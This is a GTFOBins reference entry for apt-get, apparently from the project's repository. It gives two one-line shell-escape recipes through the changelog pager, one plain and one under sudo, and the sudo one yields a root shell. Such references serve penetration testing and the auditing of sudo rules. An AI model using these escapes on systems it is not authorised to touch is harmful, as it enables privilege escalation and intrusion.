GTFOBins.github.io/_gtfobins/apt-get.md
2018-10-05 18:55:38 +01:00

13 lines
284 B
Markdown

---
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
functions:
shell:
- code: |
apt-get changelog apt
!/bin/sh
sudo:
- code: |
sudo apt-get changelog apt
!/bin/sh
---